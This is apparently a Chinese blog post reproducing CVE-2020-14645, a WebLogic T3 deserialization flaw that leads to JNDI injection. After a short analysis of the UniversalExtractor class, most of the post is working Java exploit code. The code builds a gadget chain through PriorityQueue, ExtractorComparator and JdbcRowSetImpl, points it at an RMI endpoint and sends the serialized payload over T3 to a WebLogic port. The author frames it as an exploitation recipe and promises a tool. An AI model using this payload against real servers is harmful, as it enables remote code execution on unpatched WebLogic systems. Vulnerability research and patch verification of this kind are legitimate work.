• oracle 7月份更新CVE-2020-14645 T3反序列化 Weblogic12.2.1.4.0 JNDI注入 Payload 复现&利用


    简介

    该漏洞针对gadget cve-2020-2555 绕过利用。

    分析

    com.tangosol.util.extractor.UniversalExtractor代码如下

        public UniversalExtractor() {
            this.m_sNameCanon = null;
        }
    
        public UniversalExtractor(String sName) {
            this(sName, (Object[])null, 0);
        }
    
        public UniversalExtractor(String sName, Object[] aoParam) {
            this(sName, aoParam, 0);
        }
    
        @JsonbCreator
        public UniversalExtractor(@JsonbProperty("name") String sName, @JsonbProperty("params") Object[] aoParam, @JsonbProperty("target") int nTarget) {
            this.m_sNameCanon = null;
            azzert(sName != null);
            if (aoParam != null && aoParam.length > 0 && !sName.endsWith("()")) {
                throw new IllegalArgumentException("UniversalExtractor constructor: parameter sName[value:" + sName + "] must end with method suffix "" + "()" + "" when optional parameters provided");
            } else {
                this.m_sName = sName;
                this.m_aoParam = aoParam;
                this.m_nTarget = nTarget;
                this.init();
            }
        }
    
        public E extract(T oTarget) {
            if (oTarget == null) {
                return null;
            } else {
                TargetReflectionDescriptor targetPrev = this.m_cacheTarget;
    
                try {
                    if (targetPrev != null && oTarget.getClass() == targetPrev.getTargetClass()) {
                        return targetPrev.isMap() ? ((Map)oTarget).get(this.getCanonicalName()) : targetPrev.getMethod().invoke(oTarget, this.m_aoParam);
                    } else {
                        return this.extractComplex(oTarget);
                    }
                } catch (NullPointerException var4) {
                    throw new RuntimeException(this.suggestExtractFailureCause(oTarget.getClass()));
                } catch (Exception var5) {
                    throw ensureRuntimeException(var5, oTarget.getClass().getName() + this + '(' + oTarget + ')');
                }
            }
        }
    

    从代码可以看出,与cve-2020-2555 类似

    利用

    只需要修改cve 2020-2555 gadget的最后一环为该类即可

    payload如下

            // 这个是临时Extractor,queue在执行add时候,会触发Extractor,所以需要构造临时
            ReflectionExtractor temp = new ReflectionExtractor("toString", new Object[]{});
            // 这个才是payload
            UniversalExtractor universalExtractor = new UniversalExtractor("getDatabaseMetaData()");
            PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(temp));
            Object a = JdbcRowSetImpl.class.newInstance();
            Method setDataSourceNameM = a.getClass().getMethod("setDataSourceName", String.class);
            setDataSourceNameM.invoke(a, "rmi://127.0.0.1:8888/xsmd");
            queue.add("1");
            queue.add("1");
    
            Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
            queueArray[0] = a;
            queueArray[1] = a;
            Field comparatorF = queue.getClass().getDeclaredField("comparator");
            comparatorF.setAccessible(true);
            comparatorF.set(queue, new ExtractorComparator(universalExtractor));
    
    //        Serializables.deserialize(Serializables.serialize(queue));
    ////        deserialize();
    //        serialize(queue);
            byte[] payload = Serializables.serialize(queue);
            // T3 send, you can also use python weblogic_t3.py test.ser
            T3ProtocolOperation.send("127.0.0.1", "7001", payload);
    

    截图如下

    后期有时间的话,可能会放出针对这次weblogic更新的利用工具

  • 相关阅读:
    B. Xor of 3 题解(思维+构造)
    小 L 与 GCD 题解(数学 hard)
    F. Clear The Matrix 题解(状压dp)
    小顶堆与大顶堆的自定义cmp函数
    字符指针、字符数组
    python中创建dict对象
    中缀表达式转后缀表达式
    vue中keep-alive,include的缓存问题
    vue 冒号 :、@、# 是什么意思? v-bind v-on v-slot v-是指令
    vue 自定义指令 v-
  • 原文地址:https://www.cnblogs.com/potatsoSec/p/13307315.html
Copyright © 2020-2023  润新知